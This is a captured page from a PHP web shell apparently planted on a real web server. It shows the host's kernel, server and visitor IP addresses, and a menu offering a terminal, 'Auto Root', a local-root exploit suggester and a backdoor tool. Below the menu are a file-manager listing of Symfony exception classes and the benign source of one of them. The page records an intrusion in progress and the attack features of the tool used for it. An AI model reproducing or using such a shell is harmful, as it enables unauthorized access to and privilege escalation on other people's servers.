Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.227.102.59
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
symfony /
http-kernel /
Exception /
Delete
Unzip
Name
Size
Permission
Date
Action
AccessDeniedHttpException.php
897
B
-rw-r--r--
2018-11-30 09:00
BadRequestHttpException.php
842
B
-rw-r--r--
2018-11-30 09:00
ConflictHttpException.php
840
B
-rw-r--r--
2018-11-30 09:00
ControllerDoesNotReturnResponseException.php
2.13
KB
-rw-r--r--
2018-11-30 09:00
GoneHttpException.php
836
B
-rw-r--r--
2018-11-30 09:00
HttpException.php
1.11
KB
-rw-r--r--
2018-11-30 09:00
HttpExceptionInterface.php
691
B
-rw-r--r--
2018-11-30 09:00
LengthRequiredHttpException.php
846
B
-rw-r--r--
2018-11-30 09:00
MethodNotAllowedHttpException.php
993
B
-rw-r--r--
2018-11-30 09:00
NotAcceptableHttpException.php
845
B
-rw-r--r--
2018-11-30 09:00
NotFoundHttpException.php
847
B
-rw-r--r--
2018-11-30 09:00
PreconditionFailedHttpException.php
850
B
-rw-r--r--
2018-11-30 09:00
PreconditionRequiredHttpException.php
898
B
-rw-r--r--
2018-11-30 09:00
ServiceUnavailableHttpException.php
1.05
KB
-rw-r--r--
2018-11-30 09:00
TooManyRequestsHttpException.php
1.09
KB
-rw-r--r--
2018-11-30 09:00
UnauthorizedHttpException.php
989
B
-rw-r--r--
2018-11-30 09:00
UnprocessableEntityHttpException.php
860
B
-rw-r--r--
2018-11-30 09:00
UnsupportedMediaTypeHttpException.php
852
B
-rw-r--r--
2018-11-30 09:00
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\Exception; /** * @author Ben Ramsey <ben@benramsey.com> */ class PreconditionFailedHttpException extends HttpException { /** * @param string $message The internal exception message * @param \Exception $previous The previous exception * @param int $code The internal exception code * @param array $headers */ public function __construct(string $message = null, \Exception $previous = null, int $code = 0, array $headers = array()) { parent::__construct(412, $message, $previous, $headers, $code); } }